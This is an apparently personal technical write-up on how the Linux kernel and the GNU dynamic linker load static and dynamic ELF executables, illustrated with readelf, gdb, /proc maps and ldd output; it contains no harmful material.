    \n
  1. the kernel maps the program in memory (and the vDSO);
  2. \n
  3. the kernel sets up the stack and registers (passing information such as the\n argument and environment variables) and calls the main program entry point.
  4. \n
\n

The executable is loaded at a fixed address and no relocation is needed.

\n

Mapping the executable in memory

\n

The program headers defines the in-memory layout of the program and\nthe location of the informations needed for loading, dynamic linking\nand more generally at runtime (for dynamic symbol resolution,\nexception handling, etc.) . The program headers are located by the\nfields e_phoff, e_phentsize and e_phnum of the ELF header. Each\nprogram header is defined as:

\n
// The fields are in a slightly different order for Elf32.\ntypedef struct\n{\n  Elf64_Word    p_type;                 /* Segment type */\n  Elf64_Word    p_flags;                /* Segment flags */\n  Elf64_Off     p_offset;               /* Segment file offset */\n  Elf64_Addr    p_vaddr;                /* Segment virtual address */\n  Elf64_Addr    p_paddr;                /* Segment physical address */\n  Elf64_Xword   p_filesz;               /* Segment size in file */\n  Elf64_Xword   p_memsz;                /* Segment size in memory */\n  Elf64_Xword   p_align;                /* Segment alignment */\n} Elf64_Phdr;\n
\n\n\n

The readelf -l command can be used to see the program headers. and\ntells us which sections are located in which segments by comparing the\nprogram headers and the section headers (the sections are explained in\nthe next section).

\n
$ readelf -l /bin/bash-static\n\nElf file type is EXEC (Executable file)\nEntry point 0x403d0e\nThere are 6 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000001cda14 0x00000000001cda14  R E    200000\n  LOAD           0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x000000000000a900 0x0000000000013720  RW     200000\n  NOTE           0x0000000000000190 0x0000000000400190 0x0000000000400190\n                 0x0000000000000044 0x0000000000000044  R      4\n  TLS            0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x0000000000000070 0x00000000000000a8  R      8\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x00000000001cde60 0x00000000007cde60 0x00000000007cde60\n                 0x00000000000001a0 0x00000000000001a0  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00     .note.ABI-tag .note.gnu.build-id .rela.plt .init .plt .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table\n   01     .tdata .init_array .fini_array .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs\n   02     .note.ABI-tag .note.gnu.build-id\n   03     .tdata .tbss\n   04\n   05     .tdata .init_array .fini_array .jcr .data.rel.ro .got\n
\n\n\n

Each PT_LOAD entry defines a segment which is mapped by the kernel\nin memory: the kernel maps the relevant part of the files in the\nvirtual address space of the process. Each PT_LOAD entry contains:

\n\n

We can check this with:

\n
$ gdb /bin/bash-static -s ls\n(gdb) break main\n(gdb) catch syscall execve\n(gdb) run\nStarting program: /bin/bash-static -c ls\n\nCatchpoint 1 (call to syscall execve), 0x00000000004ffb97 in ?? ()\n(gdb) !cat /proc/$(pgrep bash-static)/maps\n00400000-005ce000 r-xp 00000000 08:11 524423             /bin/bash-static\n007cd000-007d9000 rw-p 001cd000 08:11 524423             /bin/bash-static\n007d9000-00805000 rw-p 00000000 00:00 0                  [heap]\n7ffff7e69000-7ffff7e70000 r--s 00000000 08:11 1192265    /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache\n7ffff7e70000-7ffff7ffb000 r--p 00000000 08:11 787456     /usr/lib/locale/locale-archive\n7ffff7ffb000-7ffff7ffd000 r-xp 00000000 00:00 0          [vdso]\n7ffff7ffd000-7ffff7fff000 r--p 00000000 00:00 0          [vvar]\n7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0          [stack]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]\n
\n\n\n

The memory mappings of the bash-static executable correspond to the\nPT_LOAD entries of the ELF file:

\n\n

The size of this second segment is larger in memory than on file: the\nremaining bytes are filled with zeros (.bss).

\n

Sections

\n

The ELF file contains a list of sections as well: the sections are not\nuseful at runtime but can be used to understand the different parts of\nthe binary and and are used by the debuggers.

\n

The section headers describe the sections in the ELF object. Those\nheaders are located using the e_shoff, e_shentsize and e_shnum\nfields of the ELF header. Each section header is defined as:

\n
typedef struct\n{\n  ElfXX_Word    sh_name;                /* Section name (string tbl index) */\n  ElfXX_Word    sh_type;                /* Section type */\n  ElfXx_Word    sh_flags;               /* Section flags */\n  ElfXx_Addr    sh_addr;                /* Section virtual addr at execution */\n  ElfXx_Off     sh_offset;              /* Section file offset */\n  ElfXx_Word    sh_size;                /* Section size in bytes */\n  ElfXX_Word    sh_link;                /* Link to another section */\n  ElfXX_Word    sh_info;                /* Additional section information */\n  ElfXX_Word    sh_addralign;           /* Section alignment */\n  ElfXX_Word    sh_entsize;             /* Entry size if section holds table */\n} ElfXX_Shdr;\n
\n\n\n

readelf -S displays the sections headers:

\n
$ readelf -S /bin/bash-static\nThere are 28 section headers, starting at offset 0x1d8898:\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [ 0]                   NULL             0000000000000000  00000000\n       0000000000000000  0000000000000000           0     0     0\n  [ 1] .note.ABI-tag     NOTE             0000000000400190  00000190\n       0000000000000020  0000000000000000   A       0     0     4\n  [ 2] .note.gnu.build-i NOTE             00000000004001b0  000001b0\n       0000000000000024  0000000000000000   A       0     0     4\n  [ 3] .rela.plt         RELA             00000000004001d8  000001d8\n       00000000000001b0  0000000000000018  AI       0     5     8\n  [ 4] .init             PROGBITS         0000000000400388  00000388\n       000000000000001a  0000000000000000  AX       0     0     4\n  [ 5] .plt              PROGBITS         00000000004003b0  000003b0\n       0000000000000120  0000000000000000  AX       0     0     16\n  [ 6] .text             PROGBITS         00000000004004d0  000004d0\n       0000000000159ab4  0000000000000000  AX       0     0     16\n  [ 7] __libc_freeres_fn PROGBITS         0000000000559f90  00159f90\n       0000000000000d9c  0000000000000000  AX       0     0     16\n  [ 8] __libc_thread_fre PROGBITS         000000000055ad30  0015ad30\n       00000000000000e0  0000000000000000  AX       0     0     16\n  [ 9] .fini             PROGBITS         000000000055ae10  0015ae10\n       0000000000000009  0000000000000000  AX       0     0     4\n  [10] .rodata           PROGBITS         000000000055ae40  0015ae40\n       00000000000469e0  0000000000000000   A       0     0     64\n  [11] __libc_subfreeres PROGBITS         00000000005a1820  001a1820\n       00000000000000a0  0000000000000000   A       0     0     8\n  [12] __libc_atexit     PROGBITS         00000000005a18c0  001a18c0\n       0000000000000008  0000000000000000   A       0     0     8\n  [13] __libc_thread_sub PROGBITS         00000000005a18c8  001a18c8\n       0000000000000010  0000000000000000   A       0     0     8\n  [14] .eh_frame         PROGBITS         00000000005a18d8  001a18d8\n       000000000002bff4  0000000000000000   A       0     0     8\n  [15] .gcc_except_table PROGBITS         00000000005cd8cc  001cd8cc\n       0000000000000148  0000000000000000   A       0     0     1\n  [16] .tdata            PROGBITS         00000000007cde60  001cde60\n       0000000000000070  0000000000000000 WAT       0     0     8\n  [17] .tbss             NOBITS           00000000007cded0  001cded0\n       0000000000000038  0000000000000000 WAT       0     0     8\n  [18] .init_array       INIT_ARRAY       00000000007cded0  001cded0\n       0000000000000010  0000000000000000  WA       0     0     8\n  [19] .fini_array       FINI_ARRAY       00000000007cdee0  001cdee0\n       0000000000000010  0000000000000000  WA       0     0     8\n  [20] .jcr              PROGBITS         00000000007cdef0  001cdef0\n       0000000000000008  0000000000000000  WA       0     0     8\n  [21] .data.rel.ro      PROGBITS         00000000007cdf00  001cdf00\n       00000000000000e4  0000000000000000  WA       0     0     32\n  [22] .got              PROGBITS         00000000007cdfe8  001cdfe8\n       0000000000000010  0000000000000008  WA       0     0     8\n  [23] .got.plt          PROGBITS         00000000007ce000  001ce000\n       00000000000000a8  0000000000000008  WA       0     0     8\n  [24] .data             PROGBITS         00000000007ce0c0  001ce0c0\n       000000000000a6a0  0000000000000000  WA       0     0     64\n  [25] .bss              NOBITS           00000000007d8780  001d8760\n       0000000000008d88  0000000000000000  WA       0     0     64\n  [26] __libc_freeres_pt NOBITS           00000000007e1508  001d8760\n       0000000000000078  0000000000000000  WA       0     0     8\n  [27] .shstrtab         STRTAB           0000000000000000  001d8760\n       0000000000000134  0000000000000000           0     0     1\nKey to Flags:\n  W (write), A (alloc), X (execute), M (merge), S (strings), l (large)\n  I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)\n  O (extra OS processing required) o (OS specific), p (processor specific)\n
\n\n\n

The GDB info files command can be used to display the different sections of a\nprocess.

\n

Calling the program entry point

\n

The kernel then sets up the (first, main) stack for the process and calls the\nentry point of the program (located with the e_entry field of the ELF header).

\n

The stack of the process and its initial registers are used to pass\ninformations to the process such as:

\n\n

More information about the auxiliary vector can be found in man\ngetauxval and\nthe relevant specs. We can display the auxiliary vector at the startup\nof a dynamically-linked executable by passing LD_SHOW_AUXV=1 is in\nits environment:

\n
$ LD_SHOW_AUXV=1 /bin/true\nAT_SYSINFO_EHDR: 0x7fffed9fc000\nAT_HWCAP:        bfebfbff\nAT_PAGESZ:       4096\nAT_CLKTCK:       100\nAT_PHDR:         0x400040\nAT_PHENT:        56\nAT_PHNUM:        9\nAT_BASE:         0x7f6ba3e9f000\nAT_FLAGS:        0x0\nAT_ENTRY:        0x401432\nAT_UID:          1000\nAT_EUID:         1000\nAT_GID:          1000\nAT_EGID:         1000\nAT_SECURE:       0\nAT_RANDOM:       0x7fffed8b92d9\nAT_EXECFN:       /bin/true\nAT_PLATFORM:     x86_64\n
\n\n\n

Auxiliary vector in the AMD-64 ABI

\n

For example, the System V ABI, AMD64 supplement\ndefined in section 3.1 (Process Initialization) defines that the stack\ncontains:

\n\n

The corresponding strings are stored after this on the stack.

\n

Dynamic Binary

\n

When dynamic linking is involved, things are more complicated: the libraries\nmust be mapped in memory and the symbols must be resolved.

\n

The libraries must be able to be loaded anywhere in\nthe process virtual address space and must be relocated. The kernel does only\nmap the program file in memory but the dynamic linker (a.k.a. the interpreter)\nas well which must:

\n\n

This is a very high level overview as I understand it:

\n
    \n
  1. \n

    the kernels initialises the process:

    \n
      \n
    1. \n

      it maps the main program, the interpreter (dynamic linker)\n segments and the vDSO in the virtual address space;

      \n
    2. \n
    3. \n

      it sets up the stack (passing the arguments, environment) and\n calls the dynamic linker entry point;

      \n
    4. \n
    \n
  2. \n
  3. \n

    the dynamic linker loads the different ELF objects and binds them together

    \n
      \n
    1. \n

      it relocates itself (!);

      \n
    2. \n
    3. \n

      it finds and loads the necessary libraries;

      \n
    4. \n
    5. \n

      it does the relocations (which binds the ELF objects);

      \n
    6. \n
    7. \n

      it calls the initialisation functions functions of the shared objects;

      \n
    8. \n
    \n

    Those functions are specified in the DT_INIT and DT_INIT_ARRAY\n entries of the ELF objects.

    \n
      \n
    1. it calls the main program entry point;
    2. \n
    \n

    The main program entry point is found in the AT_ENTRY entry of the\n auxiliary vector: it has been initialised by the kernel from the e_entry\n ELF header field.

    \n
  4. \n
  5. \n

    the executable then initialises itself.

    \n
  6. \n
\n

Base address

\n

The shared objects are designed to be mapped anywhere in the virtual address\nspace without modification: the read-only segment is mapped unmodified in each\ninstance of the shared object and every instance of the library shares the same\nmemory pages for this segment. For this reason, the virtual addresses expressed\nin many data structures ELF (such as in the program headers) are expressed as\noffset from the base address of the shared object (the address at which the\nshared object is mapped):

\n
$ readelf -l /lib/x86_64-linux-gnu/libc.so.6 | less\nElf file type is DYN (Shared object file)\nEntry point 0x21c50\nThere are 10 program headers, starting at offset 64\n\nProgram Headers:\nType           Offset             VirtAddr           PhysAddr\nFileSiz            MemSiz              Flags  Align\nPHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040\n0x0000000000000230 0x0000000000000230  R E    8\nINTERP         0x000000000016bfb0 0x000000000016bfb0 0x000000000016bfb0\n0x000000000000001c 0x000000000000001c  R      10\n[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\nLOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000\n0x000000000019e774 0x000000000019e774  R E    200000\nLOAD           0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x0000000000004ff8 0x00000000000092e0  RW     200000\nDYNAMIC        0x00000000001a2ba0 0x00000000003a2ba0 0x00000000003a2ba0\n0x00000000000001e0 0x00000000000001e0  RW     8\nNOTE           0x0000000000000270 0x0000000000000270 0x0000000000000270\n0x0000000000000044 0x0000000000000044  R      4\nTLS            0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x0000000000000010 0x0000000000000080  R      8\nGNU_EH_FRAME   0x000000000016bfcc 0x000000000016bfcc 0x000000000016bfcc\n0x0000000000006a24 0x0000000000006a24  R      4\nGNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n0x0000000000000000 0x0000000000000000  RW     10\nGNU_RELRO      0x000000000019f740 0x000000000039f740 0x000000000039f740\n0x00000000000038c0 0x00000000000038c0  R      1\n\nSection to Segment mapping:\nSegment Sections...\n00\n01     .interp\n02     .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .gnu.version_r .rela.dyn .rela.plt .plt .text __libc_freeres_fn __libc_thread_freeres_fn .rodata .interp .eh_frame_hdr .eh_frame .gcc_except_table .hash\n03     .tdata .init_array __libc_subfreeres __libc_atexit __libc_thread_subfreeres .data.rel.ro .dynamic .got .got.plt .data .bss\n04     .dynamic\n05     .note.gnu.build-id .note.ABI-tag\n06     .tdata .tbss\n07     .eh_frame_hdr\n08\n09     .tdata .init_array __libc_subfreeres __libc_atexit __libc_thread_subfreeres .data.rel.ro .dynamic .got\n
\n\n\n

In this example the second LOAD segment of the libc is mapped at\n0x000000000039f740 + base_address = 0x000000000039f740 + 0x7f69eab7a000:

\n
$ cat /proc/$(pgrep sleep)/maps\n00400000-00407000 r-xp 00000000 08:01 527401            /bin/sleep\n00606000-00607000 r--p 00006000 08:01 527401            /bin/sleep\n00607000-00608000 rw-p 00007000 08:01 527401            /bin/sleep\n0141f000-01440000 rw-p 00000000 00:00 0                 [heap]\n7f69eab7a000-7f69ead19000 r-xp 00000000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69ead19000-7f69eaf19000 ---p 0019f000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf19000-7f69eaf1d000 r--p 0019f000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf1d000-7f69eaf1f000 rw-p 001a3000 08:01 2626010   /lib/x86_64-linux-gnu/libc-2.19.so\n7f69eaf1f000-7f69eaf23000 rw-p 00000000 00:00 0\n7f69eaf23000-7f69eaf43000 r-xp 00000000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eaf85000-7f69eb10e000 r--p 00000000 08:01 2245023   /usr/lib/locale/locale-archive\n7f69eb10e000-7f69eb111000 rw-p 00000000 00:00 0\n7f69eb141000-7f69eb143000 rw-p 00000000 00:00 0\n7f69eb143000-7f69eb144000 r--p 00020000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eb144000-7f69eb145000 rw-p 00021000 08:01 2625993   /lib/x86_64-linux-gnu/ld-2.19.so\n7f69eb145000-7f69eb146000 rw-p 00000000 00:00 0\n7fffffeaa000-7fffffecb000 rw-p 00000000 00:00 0         [stack]\n7ffffff03000-7ffffff05000 r-xp 00000000 00:00 0         [vdso]\n7ffffff05000-7ffffff07000 r--p 00000000 00:00 0         [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n
\n\n\n

Some part of the second PT_LOAD segment is readonly: this is because of the\nPT_GNU_RELRO program header. This program header asks the dynamic linker to\nmark this part of the memory in read-only after the relocation is done.

\n

Mapping the executable in memory

\n

As before the kernels maps the executable in memory using the DT_LOAD entries:

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n  INTERP         0x0000000000000238 0x0000000000400238 0x0000000000400238\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000000f1a74 0x00000000000f1a74  R E    200000\n  LOAD           0x00000000000f1de0 0x00000000006f1de0 0x00000000006f1de0\n                 0x0000000000009068 0x000000000000f298  RW     200000\n  DYNAMIC        0x00000000000f1df8 0x00000000006f1df8 0x00000000006f1df8\n                 0x0000000000000200 0x0000000000000200  RW     8\n  NOTE           0x0000000000000254 0x0000000000400254 0x0000000000400254\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000d6af0 0x00000000004d6af0 0x00000000004d6af0\n                 0x000000000000407c 0x000000000000407c  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x00000000000f1de0 0x00000000006f1de0 0x00000000006f1de0\n                 0x0000000000000220 0x0000000000000220  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n   02     .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame\n   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss\n   04     .dynamic\n   05     .note.ABI-tag .note.gnu.build-id\n   06     .eh_frame_hdr\n   07\n   08     .init_array .fini_array .jcr .dynamic .got\n
\n\n\n

Finding the interpreter and running the interpreter

\n

Finding the interpreter

\n

The location of the dynamic linker (also called the interpreter) to\nuse is hard-coded in the executable: the PT_INTERP entry in the\nprogram headers defines the location of this string in the executable\nfile and in the process virtual address space.

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n[...]\n\n Section to Segment mapping:\n  Segment Sections...\n   00\n   01     .interp\n[...]\n
\n\n\n

Mapping the interpreter

\n

The dynamic linker (/lib64/ld-linux-x86-64.so.2) is mapped by the kernel in\nthe virtual address space of the process (using the PT_LOAD entries):

\n
$ readelf -l /lib64/ld-linux-x86-64.so.2\n\nElf file type is DYN (Shared object file)\nEntry point 0x1190\nThere are 7 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x000000000001fe08 0x000000000001fe08  R E    200000\n  LOAD           0x0000000000020c00 0x0000000000220c00 0x0000000000220c00\n                 0x00000000000013e4 0x00000000000015a8  RW     200000\n  DYNAMIC        0x0000000000020e70 0x0000000000220e70 0x0000000000220e70\n                 0x0000000000000170 0x0000000000000170  RW     8\n  NOTE           0x00000000000001c8 0x00000000000001c8 0x00000000000001c8\n                 0x0000000000000024 0x0000000000000024  R      4\n  GNU_EH_FRAME   0x000000000001d440 0x000000000001d440 0x000000000001d440\n                 0x000000000000064c 0x000000000000064c  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x0000000000020c00 0x0000000000220c00 0x0000000000220c00\n                 0x0000000000000400 0x0000000000000400  R      1\n\n Section to Segment mapping:\n  Segment Sections...\n   00     .note.gnu.build-id .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_d .rela.dyn .rela.plt .plt .text .rodata .eh_frame_hdr .eh_frame\n   01     .data.rel.ro .dynamic .got .got.plt .data .bss\n   02     .dynamic\n   03     .note.gnu.build-id\n   04     .eh_frame_hdr\n   05\n   06     .data.rel.ro .dynamic .got\n
\n\n\n

Calling the interpreter

\n

Now the kernel calls the entry point of the dynamic linker located by the\ne_entry field of its ELF header with the arguments, environment and auxiliary\nvector:

\n
$ readelf -h /lib64/ld-linux-x86-64.so.2\nELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n  Data:                              2's complement, little endian\n  Version:                           1 (current)\n  OS/ABI:                            UNIX - System V\n  ABI Version:                       0\n  Type:                              DYN (Shared object file)\n  Machine:                           Advanced Micro Devices X86-64\n  Version:                           0x1\n  Entry point address:               0x1190\n  Start of program headers:          64 (bytes into file)\n  Start of section headers:          139456 (bytes into file)\n  Flags:                             0x0\n  Size of this header:               64 (bytes)\n  Size of program headers:           56 (bytes)\n  Number of program headers:         7\n  Size of section headers:           64 (bytes)\n  Number of section headers:         23\n  Section header string table index: 22\n
\n\n\n

The auxiliary vector contains informations which will be used by the\ndynamic linker, and the libc. Some interesting values for the\ndynamic linker are:

\n\n

AT_PHDR can be used to find the base address of the executable with:

\n
// Simplified code from the GNU dynamic linker source code:\nfor (ph = phdr; ph < &phdr[phnum]; ++ph)\n  if (ph->p_type == PT_PHDR)\n    main_map->l_addr = (ElfW(Addr)) phdr - ph->p_vaddr;\n
\n\n\n

Here are some values for a given process:

\n
$ LD_SHOW_AUXV=1 /bin/bash -c \"unset LD_SHOW_AUXV; sleep 100000\"\nAT_SYSINFO_EHDR: 0x7fff5cbfc000\nAT_HWCAP:        bfebfbff\nAT_PAGESZ:       4096\nAT_CLKTCK:       100\nAT_PHDR:         0x400040\nAT_PHENT:        56\nAT_PHNUM:        9\nAT_BASE:         0x7ffdd94ce000\nAT_FLAGS:        0x0\nAT_ENTRY:        0x4205bc\nAT_UID:          1000\nAT_EUID:         1000\nAT_GID:          1000\nAT_EGID:         1000\nAT_SECURE:       0\nAT_RANDOM:       0x7fff5ca4ddf9\nAT_EXECFN:       /bin/bash\nAT_PLATFORM:     x86_64\n
\n\n\n

We can see that the AT_BASE field is the base address of the dynamic linker\nand the AT_PHDR is at the beginning of the executable mapping:

\n
$ cat /proc/10130/maps\n00400000-004f2000 r-xp 00000000 08:11 526344            /bin/bash\n006f1000-006f2000 r--p 000f1000 08:11 526344            /bin/bash\n006f2000-006fb000 rw-p 000f2000 08:11 526344            /bin/bash\n006fb000-00702000 rw-p 00000000 00:00 0\n01729000-01738000 rw-p 00000000 00:00 0                 [heap]\n7ffdd8ad2000-7ffdd8c71000 r-xp 00000000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8c71000-7ffdd8e71000 ---p 0019f000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e71000-7ffdd8e75000 r--p 0019f000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e75000-7ffdd8e77000 rw-p 001a3000 08:11 1192272   /lib/x86_64-linux-gnu/libc-2.19.so\n7ffdd8e77000-7ffdd8e7b000 rw-p 00000000 00:00 0\n7ffdd8e7b000-7ffdd8e7e000 r-xp 00000000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd8e7e000-7ffdd907d000 ---p 00003000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907d000-7ffdd907e000 r--p 00002000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907e000-7ffdd907f000 rw-p 00003000 08:11 1192277   /lib/x86_64-linux-gnu/libdl-2.19.so\n7ffdd907f000-7ffdd90a5000 r-xp 00000000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd90a5000-7ffdd92a4000 ---p 00026000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a4000-7ffdd92a8000 r--p 00025000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a8000-7ffdd92a9000 rw-p 00029000 08:11 1180383   /lib/x86_64-linux-gnu/libtinfo.so.5.9\n7ffdd92a9000-7ffdd92cd000 r-xp 00000000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd92cd000-7ffdd94cc000 ---p 00024000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94cc000-7ffdd94cd000 r--p 00023000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94cd000-7ffdd94ce000 rw-p 00024000 08:11 1183083   /lib/x86_64-linux-gnu/libncurses.so.5.9\n7ffdd94ce000-7ffdd94ee000 r-xp 00000000 08:11 1192269   /lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd951c000-7ffdd96a7000 r--p 00000000 08:11 787456    /usr/lib/locale/locale-archive\n7ffdd96a7000-7ffdd96ab000 rw-p 00000000 00:00 0\n7ffdd96e5000-7ffdd96ec000 r--s 00000000 08:11 1192265   /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache\n7ffdd96ec000-7ffdd96ee000 rw-p 00000000 00:00 0\n7ffdd96ee000-7ffdd96ef000 r--p 00020000 08:11 1192269   /lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd96ef000-7ffdd96f0000 rw-p 00021000 08:11 1192269   /lib/x86_64-linux-gnu/ld-2.19.so\n7ffdd96f0000-7ffdd96f1000 rw-p 00000000 00:00 0\n7fff5ca2f000-7fff5ca50000 rw-p 00000000 00:00 0         [stack]\n7fff5cbfc000-7fff5cbfe000 r-xp 00000000 00:00 0         [vdso]\n7fff5cbfe000-7fff5cc00000 r--p 00000000 00:00 0         [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n
\n\n\n

Q: why is there a gap in the dynamic linker mapping?

\n

Library resolution

\n

The dynamic linker locates and maps all the required shared objects in\nthe process virtual address space. Each ELF shared object declares the\nlibraries it depends on with DT_NEEDED entries in in the dynamic\nsection.

\n

The PT_DYNAMIC program header locates the position of dynamic\n(.dynamic) section in the file and in the virtual address space of\nthe process (as an offset from the base address of the ELF object).

\n
$ readelf -l /bin/bash\n\nElf file type is EXEC (Executable file)\nEntry point 0x4205bc\nThere are 9 program headers, starting at offset 64\n\nProgram Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n[...]\n  DYNAMIC        0x00000000000f1df8 0x00000000006f1df8 0x00000000006f1df8\n                 0x0000000000000200 0x0000000000000200  RW     8\n[...]\n\n Section to Segment mapping:\n  Segment Sections...\n[...]\n   04     .dynamic\n[...]\n
\n\n\n

The content of the dynamic section can be shown by readelf -d:

\n
$ readelf -d /bin/bash\n\nDynamic section at offset 0xf1df8 contains 27 entries:\n  Tag        Type                         Name/Value\n 0x0000000000000001 (NEEDED)             Shared library: [libncurses.so.5]\n 0x0000000000000001 (NEEDED)             Shared library: [libtinfo.so.5]\n 0x0000000000000001 (NEEDED)             Shared library: [libdl.so.2]\n 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]\n 0x000000000000000c (INIT)               0x41d570\n 0x000000000000000d (FINI)               0x4b7f34\n 0x0000000000000019 (INIT_ARRAY)         0x6f1de0\n 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)\n 0x000000000000001a (FINI_ARRAY)         0x6f1de8\n 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)\n 0x000000006ffffef5 (GNU_HASH)           0x400298\n 0x0000000000000005 (STRTAB)             0x4121f8\n 0x0000000000000006 (SYMTAB)             0x404b30\n 0x000000000000000a (STRSZ)              35877 (bytes)\n 0x000000000000000b (SYMENT)             24 (bytes)\n 0x0000000000000015 (DEBUG)              0x0\n 0x0000000000000003 (PLTGOT)             0x6f2000\n 0x0000000000000002 (PLTRELSZ)           5112 (bytes)\n 0x0000000000000014 (PLTREL)             RELA\n 0x0000000000000017 (JMPREL)             0x41c178\n 0x0000000000000007 (RELA)               0x41c0b8\n 0x0000000000000008 (RELASZ)             192 (bytes)\n 0x0000000000000009 (RELAENT)            24 (bytes)\n 0x000000006ffffffe (VERNEED)            0x41c008\n 0x000000006fffffff (VERNEEDNUM)         2\n 0x000000006ffffff0 (VERSYM)             0x41ae1e\n 0x0000000000000000 (NULL)               0x0\n
\n\n\n

The dynamic section declares each shared object dependency as a\nDT_NEEDED entry. The dynamic linker (transitively) finds all those\nDT_NEEDED entries and maps the corresponding shared object in the\nprocess virtual address space:

\n

If the DT_NEEDED has any /, it is treated as a full path name.

\n

Otherwise, the file is searched in the following locations:

\n\n

A suffix can be added after each of those paths based on the processor\ncapabilities. For example, /lib/i386-linux-gnu/i686/cmov/ for a processor\nwith support for i686 features and the cmov (Conditional Move) instructions.

\n

The libraries specified in LD_PRELOAD (and their dependencies) are loaded as\nwell using the same algorithm.

\n

The ldd tool can be used to find all the ELF objects loaded by the dynamic\nlinker:

\n
$ ldd /bin/bash\n  linux-vdso.so.1 (0x00007fff88bfc000)\n  libncurses.so.5 => /lib/x86_64-linux-gnu/libncurses.so.5 (0x00007f6a58816000)\n  libtinfo.so.5 => /lib/x86_64-linux-gnu/libtinfo.so.5 (0x00007f6a585ec000)\n  libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f6a583e7000)\n  libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a5803e000)\n  /lib64/ld-linux-x86-64.so.2 (0x00007f6a58a6c000)\n
